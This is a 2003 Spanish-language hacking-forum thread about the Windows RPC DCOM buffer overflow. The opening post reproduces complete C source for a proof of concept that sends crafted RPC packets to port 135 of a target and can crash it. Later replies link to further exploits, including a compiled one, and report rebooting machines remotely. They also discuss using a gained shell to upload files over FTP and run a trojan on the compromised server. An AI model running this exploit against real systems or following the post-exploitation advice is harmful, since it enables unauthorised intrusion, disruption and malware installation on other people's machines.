elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: Sigue las noticias más importantes de elhacker.net en ttwitter!


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Exploit para el overflow del RPC de windows (DCOM) :D
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Exploit para el overflow del RPC de windows (DCOM) :D  (Leído 13,668 veces)
Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.535



Ver Perfil WWW
Exploit para el overflow del RPC de windows (DCOM) :D
« en: 24 Julio 2003, 03:20 »

Por fin sacaron el exploit!!!  ;D

Este es el fallo:
http://www.hispasec.com/unaaldia/1728/

Y este el exploit (solo para win2k? ) :

------------------------------------------------------------------------

#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};



void main(int argc,char ** argv)
{
    WSADATA WSAData;
 int i;
    SOCKET sock;
    SOCKADDR_IN addr_in;
 
 short port=135;
 unsigned char buf1[0x1000];
 printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org\n");
 printf("Code by FlashSky,Flashsky@xfocus.org,benjurry,benjurry@xfocus.org\n");
 printf("Welcome to http://www.xfocus.net\n");
 if(argc<2)
 {
  printf("useage:%s target\n",argv[0]);exit(1);
 }


    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error.Error:%d\n",WSAGetLastError());
        return;
    }

    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
 
 if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("Socket failed.Error:%d\n",WSAGetLastError());
        return;
    }
 if(WSAConnect(sock,(struct sockaddr*)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
 {
  printf("Connect failed.Error:%d",WSAGetLastError());
  return;
 }
 if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
 {
   printf("Send failed.Error:%d\n",WSAGetLastError());
   return;
 }

 i=recv(sock,buf1,1024,MSG_PEEK);
 if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)
 {
   printf("Send failed.Error:%d\n",WSAGetLastError());
   return;
 }
 i=recv(sock,buf1,1024,MSG_PEEK);
}

----------------------------------------------------------------------

Fuente:
http://www.security.nnov.ru/files/w2krpcdos.c

Jea, jea, Microsoft es la leche xDDD

*******************Editado****************

Me acabo de dar cuenta, las shellcodes no tienen muchos nulls?? (0x00) Para mi que esto no funciona..., pues los arrays creeran que los 0x00 son los "fin de cadena" y no pasaran los demas opcodes...

Tengo q hacer pruebas... =8-)
« Última modificación: 24 Julio 2003, 03:22 por Rojodos » En línea

cokeing


Desconectado Desconectado

Mensajes: 1.036


SôNïC r0oLz


Ver Perfil
Re:Exploit para el overflow del RPC de windows (DCOM) :D
« Respuesta #1 en: 25 Julio 2003, 10:38 »

este archivo no lo puedo compilar yo :(
debe ser para windows ¬¬

sabeis algun compilador (SOLO COMPILADOR (como gcc)) de windows?

asi lo ejecuto con el wine y yata...

saludos.cokeing y a petar win's xD
En línea

Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.535



Ver Perfil WWW
Re:Exploit para el overflow del RPC de windows (DCOM) :D
« Respuesta #2 en: 25 Julio 2003, 11:43 »

Puedes usar el LCCWin, tiene el mismo motor que el GCC y es muy sencillo.

A mi me da que este exploit no tira, por lo que dije de los nulls.. Lamentablemente no lo he podido probar aun....

Y si, aunq no lo creas, es para win (fijate en las cabeceras que usa, winsock2.h, windows.h, etc...)
En línea

SpeDhy


Desconectado Desconectado

Mensajes: 652


Investiga, practica y pregunta...


Ver Perfil
Re:Exploit para el overflow del RPC de windows (DCOM) :D
« Respuesta #3 en: 26 Julio 2003, 12:14 »

me podrian ayudar en como encontrar esta vulnerabilidad en un sistema y como explotarla, de manera muy general, solo para darme una idea y yo despues le investigo aparte.

saludos y gracias...
En línea

Ayuda sin esperar nada a cambio...
EL_ZoRRo

Desconectado Desconectado

Mensajes: 234



Ver Perfil
Re:Exploit para el overflow del RPC de windows (DCOM) :D
« Respuesta #4 en: 27 Julio 2003, 14:59 »

este codigo tiene errores al compilarlo desde mi dev-c++ me tira ciertos errores todavia no estoy en tema como para corregirlos
¡Alguien lo pudo compilar? o me dice donde puedo conseguir este codigo sin que este capado
Gracias Un Saludo
En línea

Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.535



Ver Perfil WWW
Re:Exploit para el overflow del RPC de windows (DCOM) :D
« Respuesta #5 en: 28 Julio 2003, 02:53 »

Bueno, creo que el exploit que puse no es "el oficial", sino otro que si que tiene pinta de funcionar:

http://www.metasploit.com/releases.html

Click en Linux Source (obviamente para Linux xD)

Chincheta al tema :)
En línea

Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.535



Ver Perfil WWW
Re:Exploit para el overflow del RPC de windows (DCOM) :D
« Respuesta #6 en: 28 Julio 2003, 03:15 »

More info & exploits:

http://packetstormsecurity.nl/0307-exploits/benjurry.txt <--- Informacion tecnica del fallo y exploit para linux :)

http://packetstormsecurity.nl/0307-exploits/DComExpl_UnixWin32.zip   <--- EXPLOIT PARA WINDOWS, Y COMPILADO!!!

http://www.cyruxnet.com.ar/rpcxploit.htm  <---  Gran Articulo de Cyruxnet :D
« Última modificación: 28 Julio 2003, 03:19 por Rojodos » En línea

Cobac
Ex-Staff
*
Desconectado Desconectado

Mensajes: 5.465


Still In Development


Ver Perfil
Re:Exploit para el overflow del RPC de windows (DCOM) :D
« Respuesta #7 en: 28 Julio 2003, 05:07 »

de momento solo he logrado reiniciarlo remotamente  :-\ les da un error y se les reinicia por obligacion
En línea

PIV 2533 @ 2720Mhz | 512MB DRR333 @ 358 | 160 Gb + 40 Gb Seagate Barracuda

En la Edad Media la Iglesia robaba con los diezmos. En el siglo XXI la SGAE roba con sus cánones.
^EsPaNiA^

Desconectado Desconectado

Mensajes: 6



Ver Perfil
Re:Exploit para el overflow del RPC de windows (DCOM) :D
« Respuesta #8 en: 30 Julio 2003, 00:03 »

A mi me ha ido pero despues al crear la cuenta shell no me ha rulado el telnet... Sabeis donde puedo conseguir mas informacion sobre los comandos de net y como subir algun archivo y su ejecucion.
En línea

Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.535



Ver Perfil WWW
Re:Exploit para el overflow del RPC de windows (DCOM) :D
« Respuesta #9 en: 30 Julio 2003, 00:09 »

Para subir archivos luego, una vez tengas la shell, simplemente usa FTP, por MSDOS.

Seguramente sera un troyano, lo ejecutas y listo, ese server esta troyanizado
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Duda de exploit para windows 7
Hacking Básico
oliver91 7 4,143 Último mensaje 3 Junio 2011, 20:10
por oliver91
DCOM Exploit puerto 135 ¿Un ataque o aviso de escáner de puertos?
Bugs y Exploits
OLM 1 2,563 Último mensaje 12 Febrero 2012, 06:12
por kisk
ayuda dcom c++
Programación C/C++
tommylej 0 321 Último mensaje 17 Septiembre 2013, 11:20
por tommylej
Alguien sabe la historia del DCOM Final Exploit?
Seguridad
MRx86 1 483 Último mensaje 7 Octubre 2016, 23:49
por andavid
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines